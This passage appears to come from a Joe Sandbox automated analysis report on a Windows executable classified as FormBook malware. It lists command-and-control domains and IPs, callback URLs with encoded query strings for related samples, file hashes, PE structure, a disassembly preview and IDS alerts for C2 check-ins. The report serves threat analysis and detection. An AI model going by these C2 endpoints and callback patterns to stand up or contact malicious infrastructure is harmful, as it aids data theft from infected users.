                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.fonts.comexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.sandoll.co.krexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.sakkal.comexplorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.scuolatua.com:80/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3ipconfig.exe, 00000007.00000002.601572909.0000000003C42000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown

                                                                  Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  52.58.78.16
                                                                  www.ecofingers.comUnited States
                                                                  16509AMAZON-02UStrue
                                                                  62.149.128.40
                                                                  www.scuolatua.comItaly
                                                                  31034ARUBA-ASNITtrue
                                                                  162.241.62.54
                                                                  jorgeporcayo.comUnited States
                                                                  46606UNIFIEDLAYER-AS-1UStrue
                                                                  169.62.77.158
                                                                  doityourselfism.comUnited States
                                                                  36351SOFTLAYERUStrue
                                                                  34.102.136.180
                                                                  extinctionbrews.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  103.138.88.11
                                                                  okinawarongnho.comViet Nam
                                                                  45538ODS-AS-VNOnlinedataservicesVNtrue
                                                                  154.88.31.204
                                                                  www.aizaibali.comSeychelles
                                                                  40065CNSERVERSUStrue
                                                                  119.59.120.26
                                                                  www.findfoodshop.comThailand
                                                                  56067METRABYTE-TH453LadplacoutJorakhaebuaTHtrue

                                                                  General Information

                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                  Analysis ID:452667
                                                                  Start date:22.07.2021
                                                                  Start time:17:41:18
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 10m 46s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Sample file name:v8kZUFgdD4.exe
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:28
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@7/0@16/8
                                                                  EGA Information:Failed
                                                                  HDC Information:
                                                                  • Successful, ratio: 19.7% (good quality ratio 16.8%)
                                                                  • Quality average: 71.2%
                                                                  • Quality standard deviation: 34.6%
                                                                  HCA Information:
                                                                  • Successful, ratio: 97%
                                                                  • Number of executed functions: 79
                                                                  • Number of non-executed functions: 38
                                                                  Cookbook Comments:
                                                                  • Adjust boot time
                                                                  • Enable AMSI
                                                                  • Found application associated with file extension: .exe
                                                                  Warnings:
                                                                  Show All
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.88.21.125, 92.122.145.220, 104.42.151.234, 52.147.198.201, 20.82.209.183, 173.222.108.226, 173.222.108.210, 51.103.5.186, 52.251.79.25, 40.112.88.60, 80.67.82.235, 80.67.82.211, 23.35.236.56, 20.82.210.154
                                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                  • Not all processes where analyzed, report is missing behavior information

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  No simulations

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  52.58.78.16mal.exeGet hashmaliciousBrowse
                                                                  • www.sarahcarver.com/sm3l/?y0DdGli=yq5bXiAgrpTP0Cl4DWGobHu0GmgEguW+SJypzbO1DFimS8AGhR5rfP7J/muem3koPRQw&ixo0sr=dFQtk
                                                                  PO_2005042020.exeGet hashmaliciousBrowse
                                                                  • www.ameri.loans/dt9v/?WJBxWP=43H5ZqapR2U2c+53UedyyCnf/tAQMSihskCSywJ+5iH1soBQckHw2KLayvSLN2TiqtAl&tFQp=7nutZ
                                                                  Invoice-Scancopy.docxGet hashmaliciousBrowse
                                                                  • www.ess.xyz/k2m6/?-Z=5jztvT3H&eXrxUtg=48Fqwwc0TpMWpKdyZvZdJZLrLfV5OyuFq874jIM8N+PC/lGntTttinAjIfEcXvLx+ei6yw==
                                                                  ORDER 200VPS.xlsxGet hashmaliciousBrowse
                                                                  • www.aideliveryrobot.com/p2io/?bH=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&XV88=urL00v88onXp_
                                                                  LAGIk5ic3R.exeGet hashmaliciousBrowse
                                                                  • www.quickinterchangeableguitars.com/0mq2/?fDHX8=WleDGb2XfF7tUd0&o6ATq=PrDeBWOvFm4C1uiT5+TkruHjtP7PYgIXMNukuC19GOh7I/zDw4hvhKpfG3R3/sFyDX1r
                                                                  3456_RFQ998778.xlsxGet hashmaliciousBrowse
                                                                  • www.jmbossvodka.com/gno4/?-ZS=YdtY2bnE57KZ5WgSsIzeA3q4iz7LDafvQmGQHnumUAAK16ZgD7FJS8vZbyZDCBBis2h0IQ==&e4=8pNH
                                                                  Payment_Breakdown_pdf.exeGet hashmaliciousBrowse
                                                                  • www.onlineappointmentsystem.com/ons5/?3f-=nVZuwkx8QtdDg8xrBBXA1XtU0x+dB6tS53/N0IsFnt8ggCwz+Hq54W4pscUCIRDkRkLu&YR-0=y48tk6C
                                                                  owen.exeGet hashmaliciousBrowse
                                                                  • www.syeioraom.com/a8si/?g2J4yx=-Zg4GfE&S4=2gqxBbxdCHAGZiW08HusmFGOvmsXdbr8Hht+pti8HbRhpYj5OmStbJLwswr0+a+SFvsW
                                                                  FASMW.EXEGet hashmaliciousBrowse
                                                                  • www.elprado.life/cabq/?iZ=2di86hvH&h6R8xP=7Gl0G44haCAnuWN+7VTog1C/raccTS26kDhalZqSPKgWVaNcTe2u+1G8JtOTpBZpOa50
                                                                  po_order_item_29062021.exeGet hashmaliciousBrowse
                                                                  • www.monkeyhunter.com/rht3/?y0=Btx4&RV_l=AlhR87CcH+GN+pIusHgdFqhLxnRwmvwNBNp0g7IcE6I1zhj/b7sMRAUJpklc7EpOOxOv
                                                                  Minutes of Meeting 22062021.exeGet hashmaliciousBrowse
                                                                  • www.eclorui.com/u9pi/?uXR=Z6AdLL&QDHdAp=SWx04GMips4+qG0r1MuFGGrLJlmHj2ZkiaS2KvW5DkDO80Zko+5IrbiudSoPPaV6iNFo
                                                                  PO NEW ORDER 002001123.exeGet hashmaliciousBrowse
                                                                  • www.sparktattoo.com/0mq2/?c4=IDKtp8tH&4h_hvt=idlga/P0FfYCKTBivrcOkdytvtILpJxZJlPumr4sHFEsS0Scr/u/HZg+xbKITV9CPDtJ
                                                                  Swift advice Receipt.exeGet hashmaliciousBrowse
                                                                  • www.a-v-r.com/n86i/?u2MpU0a=WwYEqAm2RTF4TFg6Jp6u7CuwpfJ8oxKF4GY56fD50OPmZs5P3Qyp6f8YN06/kKU0Yzpf&1bWh=5jQLgpC8L23
                                                                  eHTLcWfhgv.exeGet hashmaliciousBrowse
                                                                  • www.newmopeds.com/p2io/?0R-DOx9=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbf0TAQaa2gAlI7xx6A==&y6A=xFQDIPbxpJaT
                                                                  Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                                                  • www.cool-sil.com/iic6/?r4pT=y/kfwyw/RZwsvgZE5IY9NPvw7FTiW/OGKxX5BqNDRQj08yuVS/JTuewaC78miPUy3gtG&lR-x=DPUt3nr8mrdpDjG
                                                                  TT-Bank-Slip.exeGet hashmaliciousBrowse
                                                                  • www.vaginalmedicine.com/m3rc/?p2=6BmCuDx6HNPQiFPRwokPcjAogbQnX9jjbIUytqHBtaq3fAyAKA3thvTVTfc9FuV2tCtq&6lM=SJEx9rv
                                                                  Enquiry_014821-23.exeGet hashmaliciousBrowse
                                                                  • www.johnmabry.com/n86i/?zBtlQRl=Y8G/RqOPd6iMXSNDp68Mpx61scf3/6KZP+emN2XlS3BALTl1RcjIqekJnqea+Qg2WqdJDqumrQ==&-ZW=NBsHKPh0D0YP7FE
                                                                  SKM_4050210326102400 jpg.exeGet hashmaliciousBrowse
                                                                  • www.justswap.exchange/nvj9/?4h=Cjox&2d=Gj4Cv32t3ARgUuXe7mKAQ+9mCrtvpk7DjPJ1bxEeyJuHh3fNmA6VhARMN6sncqWGGRf/
                                                                  kkaH2ZEdQ1.exeGet hashmaliciousBrowse
                                                                  • www.cacacece.com/ybn/?oRm8=s8YlDbK80xIp&-ZdTr=nRee68VRz3NrMycEhRd2xL3VYKU8ZPsfy7+/YZQiZ17kpYPgKQlxEGBpOHvvMJMEZLP0
                                                                  RE Purchase Order.exeGet hashmaliciousBrowse
                                                                  • www.dahumblehustla.com/u6e4/?WBZD=FcjbzBS6ioR5wNj31i3bICntrHdtVtLDdz4suCSLzvDCKJtKmLQo4u4Bo+cvT6cF9+Bm&TR-=0b08lfbHdjGhtdZp

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  www.scuolatua.comSwift-Payment_Details.xlsxGet hashmaliciousBrowse
                                                                  • 62.149.128.40
                                                                  Rq0Y7HegCd.exeGet hashmaliciousBrowse
                                                                  • 62.149.128.40
                                                                  0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                  • 62.149.128.40
                                                                  www.aizaibali.comQxnlprRUTx.exeGet hashmaliciousBrowse
                                                                  • 154.88.31.204
                                                                  w3Qf2wBNX7.exeGet hashmaliciousBrowse
                                                                  • 154.88.31.204
                                                                  www.ecofingers.comd6qU4nYIEp.exeGet hashmaliciousBrowse
                                                                  • 52.58.78.16
                                                                  seBe6bgLTw.exeGet hashmaliciousBrowse
                                                                  • 13.248.216.40
                                                                  7VGeqwDKdb.exeGet hashmaliciousBrowse
                                                                  • 13.248.216.40

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  AMAZON-02USS0qI7cmeOWGet hashmaliciousBrowse
                                                                  • 35.75.55.55
                                                                  Form BA.xlsxGet hashmaliciousBrowse
                                                                  • 3.121.113.175
                                                                  #6495PI-29458-2020.exeGet hashmaliciousBrowse
                                                                  • 54.169.219.94
                                                                  Statement SKBMT 09818.jarGet hashmaliciousBrowse
                                                                  • 75.2.26.18
                                                                  DCBR.msiGet hashmaliciousBrowse
                                                                  • 18.228.5.161
                                                                  NQBNpLezqZKv1P4.exeGet hashmaliciousBrowse
                                                                  • 46.137.146.55
                                                                  kkXJRT8vEl.exeGet hashmaliciousBrowse
                                                                  • 52.217.42.228
                                                                  kS2dqbsDwD.exeGet hashmaliciousBrowse
                                                                  • 52.217.201.169
                                                                  Nb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                  • 52.216.94.27
                                                                  ovLjmo5UoEGet hashmaliciousBrowse
                                                                  • 63.34.62.30
                                                                  o3ZUDIEL1vGet hashmaliciousBrowse
                                                                  • 18.151.13.78
                                                                  D1dU3jQ1IIGet hashmaliciousBrowse
                                                                  • 34.208.242.240
                                                                  mal.exeGet hashmaliciousBrowse
                                                                  • 52.58.78.16
                                                                  vjsBNwolo9.jsGet hashmaliciousBrowse
                                                                  • 76.223.26.96
                                                                  r3xwkKS58W.exeGet hashmaliciousBrowse
                                                                  • 52.217.135.113
                                                                  A7X93JRxhpGet hashmaliciousBrowse
                                                                  • 54.151.74.14
                                                                  1Ds9g7CEspGet hashmaliciousBrowse
                                                                  • 13.208.189.104
                                                                  XuQRPW44hiGet hashmaliciousBrowse
                                                                  • 54.228.23.118
                                                                  Taf5zLti30Get hashmaliciousBrowse
                                                                  • 44.231.84.110
                                                                  5qpsqg7U0GGet hashmaliciousBrowse
                                                                  • 34.219.219.82
                                                                  ARUBA-ASNITSwift-Payment_Details.xlsxGet hashmaliciousBrowse
                                                                  • 62.149.128.40
                                                                  Xlojlgo2gbGet hashmaliciousBrowse
                                                                  • 134.255.177.23
                                                                  XfKsLIPLUuGet hashmaliciousBrowse
                                                                  • 217.73.230.179
                                                                  o0z4JJpYNfGet hashmaliciousBrowse
                                                                  • 212.237.36.89
                                                                  soa-032119.exeGet hashmaliciousBrowse
                                                                  • 62.149.128.40
                                                                  d6qU4nYIEp.exeGet hashmaliciousBrowse
                                                                  • 89.46.109.25
                                                                  1Ptfo0FZUMT7hlK.exeGet hashmaliciousBrowse
                                                                  • 89.46.110.19
                                                                  0VjjGsIIBB.exeGet hashmaliciousBrowse
                                                                  • 217.61.51.61
                                                                  WPxoHlbMVs.exeGet hashmaliciousBrowse
                                                                  • 217.61.51.61
                                                                  hiisl0XvrE.exeGet hashmaliciousBrowse
                                                                  • 217.61.51.61
                                                                  cCEP3pyVp8.exeGet hashmaliciousBrowse
                                                                  • 217.61.51.61
                                                                  pCCZmmulmJ.exeGet hashmaliciousBrowse
                                                                  • 217.61.51.61
                                                                  Rq0Y7HegCd.exeGet hashmaliciousBrowse
                                                                  • 89.46.109.25
                                                                  242jQP4mQP.exeGet hashmaliciousBrowse
                                                                  • 89.46.109.25
                                                                  RblUKpEC0p.exeGet hashmaliciousBrowse
                                                                  • 89.46.107.249
                                                                  N0vpYgIYpv.exeGet hashmaliciousBrowse
                                                                  • 62.149.144.60
                                                                  droxoUY6SU.exeGet hashmaliciousBrowse
                                                                  • 62.149.144.56
                                                                  0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                  • 62.149.128.40
                                                                  28Y753mbw5.exeGet hashmaliciousBrowse
                                                                  • 80.88.87.243
                                                                  7ujc2szSQX.exeGet hashmaliciousBrowse
                                                                  • 80.88.87.243

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  No created / dropped files found

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.939883976403979
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:v8kZUFgdD4.exe
                                                                  File size:188889
                                                                  MD5:57f3ae2842ffb5ceea386d0b97a52818
                                                                  SHA1:68423398d025d3cbbb944ee4c3cea5501df67761
                                                                  SHA256:a0c7b3d44a5cfcda917fc80c099da5ab3de582ff7c24f1373b4bd25f88d61e52
                                                                  SHA512:f398186c2f5adb9726aac3aead8289abc9288404b4b39dbabc66494a77b0160ca560cf52c9f76b15b34619f150f516a74db96db967f75942f3c9f325c5da4a81
                                                                  SSDEEP:3072:TwjHmsbeuEz5qDDOapMygfwt3AA4fce6/1DQj5U+FS8EoESO:TwjHFrtYwxAAMu/1cj51FSDdSO
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..{(dl((dl((dl(.{g()dl(.xb( dl(.{f(?dl(!..(#dl((dm(.dl(!..()dl(!..()dl(Rich(dl(........................PE..L....~.`...........

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x40205a
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x60F97EF0 [Thu Jul 22 14:21:36 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:91ecb5a25c0109a651f89e2d72e3496d

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push FFFFFFFFh
                                                                  push 004050F8h
                                                                  push 00402D34h
                                                                  mov eax, dword ptr fs:[00000000h]
                                                                  push eax
                                                                  mov dword ptr fs:[00000000h], esp
                                                                  sub esp, 58h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov dword ptr [ebp-18h], esp
                                                                  call dword ptr [00405050h]
                                                                  xor edx, edx
                                                                  mov dl, ah
                                                                  mov dword ptr [0040627Ch], edx
                                                                  mov ecx, eax
                                                                  and ecx, 000000FFh
                                                                  mov dword ptr [00406278h], ecx
                                                                  shl ecx, 08h
                                                                  add ecx, edx
                                                                  mov dword ptr [00406274h], ecx
                                                                  shr eax, 10h
                                                                  mov dword ptr [00406270h], eax
                                                                  push 00000001h
                                                                  call 00007F6BF0C0972Dh
                                                                  pop ecx
                                                                  test eax, eax
                                                                  jne 00007F6BF0C08BEAh
                                                                  push 0000001Ch
                                                                  call 00007F6BF0C08CA7h
                                                                  pop ecx
                                                                  call 00007F6BF0C0964Dh
                                                                  test eax, eax
                                                                  jne 00007F6BF0C08BEAh
                                                                  push 00000010h
                                                                  call 00007F6BF0C08C96h
                                                                  pop ecx
                                                                  xor esi, esi
                                                                  mov dword ptr [ebp-04h], esi
                                                                  call 00007F6BF0C0947Bh
                                                                  call 00007F6BF0C093D5h
                                                                  mov dword ptr [00406694h], eax
                                                                  call 00007F6BF0C0925Eh
                                                                  mov dword ptr [00406264h], eax
                                                                  call 00007F6BF0C0902Bh
                                                                  call 00007F6BF0C08F6Eh
                                                                  call 00007F6BF0C08C8Ch
                                                                  mov dword ptr [ebp-30h], esi
                                                                  lea eax, dword ptr [ebp-5Ch]
                                                                  push eax
                                                                  call dword ptr [0040504Ch]
                                                                  call 00007F6BF0C08F12h
                                                                  mov dword ptr [ebp-64h], eax
                                                                  test byte ptr [ebp-30h], 00000001h
                                                                  je 00007F6BF0C08BE8h
                                                                  movzx eax, word ptr [ebp-2Ch]

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [ C ] VS98 (6.0) build 8168
                                                                  • [C++] VS98 (6.0) build 8168
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [LNK] VS2008 SP1 build 30729

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x54300x78.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x50000xf8.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x341c0x3600False0.580005787037data6.26349761527IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x50000x9640xa00False0.44921875data5.07425103063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x60000x6980x400False0.2001953125data1.23908157506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                  Imports

                                                                  DLLImport
                                                                  USER32.dllGrayStringW, GetDC
                                                                  SHLWAPI.dllStrCmpNIA, StrToIntA, PathBuildRootA, UrlCompareA, StrCmpNA, UrlCanonicalizeA
                                                                  WINSPOOL.DRVAddJobA, GetPrinterW, DeviceCapabilitiesW, OpenPrinterA
                                                                  WS2_32.dllbind, recv, WSACleanup, getprotobyname
                                                                  KERNEL32.dllGetEnvironmentStrings, LoadLibraryA, GetProcAddress, HeapReAlloc, VirtualAlloc, HeapAlloc, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, GetModuleFileNameA, WriteFile, RtlUnwind, HeapFree, VirtualFree, HeapCreate, HeapDestroy, GetLastError, TlsGetValue, GetModuleHandleA, GetStartupInfoW, GetVersion, ExitProcess, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, GetModuleFileNameW, FreeEnvironmentStringsA, MultiByteToWideChar, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetCurrentThreadId, TlsSetValue, TlsAlloc, SetLastError

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  07/22/21-17:43:18.792527TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.634.102.136.180
                                                                  07/22/21-17:43:18.792527TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.634.102.136.180
                                                                  07/22/21-17:43:18.792527TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.634.102.136.180
                                                                  07/22/21-17:43:18.931600TCP1201ATTACK-RESPONSES 403 Forbidden804974834.102.136.180192.168.2.6
                                                                  07/22/21-17:43:31.750777ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                                                  07/22/21-17:43:36.803444TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.652.58.78.16
                                                                  07/22/21-17:43:36.803444TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.652.58.78.16
                                                                  07/22/21-17:43:36.803444TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.652.58.78.16
                                                                  07/22/21-17:43:47.172087TCP1201ATTACK-RESPONSES 403 Forbidden804975834.102.136.180192.168.2.6
                                                                  07/22/21-17:44:09.256104TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.6103.138.88.11
                                                                  07/22/21-17:44:09.256104TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.6103.138.88.11
                                                                  07/22/21-17:44:09.256104TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.6103.138.88.11
                                                                  07/22/21-17:44:14.927140TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.6162.241.62.54
                                                                  07/22/21-17:44:14.927140TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.6162.241.62.54
                                                                  07/22/21-17:44:14.927140TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.6162.241.62.54

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jul 22, 2021 17:43:11.343118906 CEST4973480192.168.2.6154.88.31.204
                                                                  Jul 22, 2021 17:43:11.575372934 CEST8049734154.88.31.204192.168.2.6
                                                                  Jul 22, 2021 17:43:12.136018038 CEST4973480192.168.2.6154.88.31.204
                                                                  Jul 22, 2021 17:43:12.368423939 CEST8049734154.88.31.204192.168.2.6
                                                                  Jul 22, 2021 17:43:13.014456034 CEST4973480192.168.2.6154.88.31.204
                                                                  Jul 22, 2021 17:43:13.246651888 CEST8049734154.88.31.204192.168.2.6
                                                                  Jul 22, 2021 17:43:14.653124094 CEST4974080192.168.2.6154.88.31.204
                                                                  Jul 22, 2021 17:43:14.882957935 CEST8049740154.88.31.204192.168.2.6
                                                                  Jul 22, 2021 17:43:15.526932955 CEST4974080192.168.2.6154.88.31.204
                                                                  Jul 22, 2021 17:43:15.758316040 CEST8049740154.88.31.204192.168.2.6
                                                                  Jul 22, 2021 17:43:16.326723099 CEST4974080192.168.2.6154.88.31.204
                                                                  Jul 22, 2021 17:43:16.556637049 CEST8049740154.88.31.204192.168.2.6
                                                                  Jul 22, 2021 17:43:18.749845028 CEST4974880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:18.792249918 CEST804974834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:18.792349100 CEST4974880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:18.792526960 CEST4974880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:18.834424019 CEST804974834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:18.931600094 CEST804974834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:18.931624889 CEST804974834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:18.931854963 CEST4974880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:18.931946039 CEST4974880192.168.2.634.102.136.180
                                                                  Jul 22, 2021 17:43:18.973994970 CEST804974834.102.136.180192.168.2.6
                                                                  Jul 22, 2021 17:43:24.088432074 CEST4975280192.168.2.6169.62.77.158
                                                                  Jul 22, 2021 17:43:24.280039072 CEST8049752169.62.77.158192.168.2.6
                                                                  Jul 22, 2021 17:43:24.283181906 CEST4975280192.168.2.6169.62.77.158
                                                                  Jul 22, 2021 17:43:24.283298969 CEST4975280192.168.2.6169.62.77.158
                                                                  Jul 22, 2021 17:43:24.473177910 CEST8049752169.62.77.158192.168.2.6
                                                                  Jul 22, 2021 17:43:24.475476027 CEST8049752169.62.77.158192.168.2.6
                                                                  Jul 22, 2021 17:43:24.475632906 CEST8049752169.62.77.158192.168.2.6
                                                                  Jul 22, 2021 17:43:24.475788116 CEST4975280192.168.2.6169.62.77.158
                                                                  Jul 22, 2021 17:43:24.475841045 CEST4975280192.168.2.6169.62.77.158
                                                                  Jul 22, 2021 17:43:24.666521072 CEST8049752169.62.77.158192.168.2.6
                                                                  Jul 22, 2021 17:43:36.760740042 CEST4975380192.168.2.652.58.78.16
                                                                  Jul 22, 2021 17:43:36.802845001 CEST804975352.58.78.16192.168.2.6
                                                                  Jul 22, 2021 17:43:36.803149939 CEST4975380192.168.2.652.58.78.16
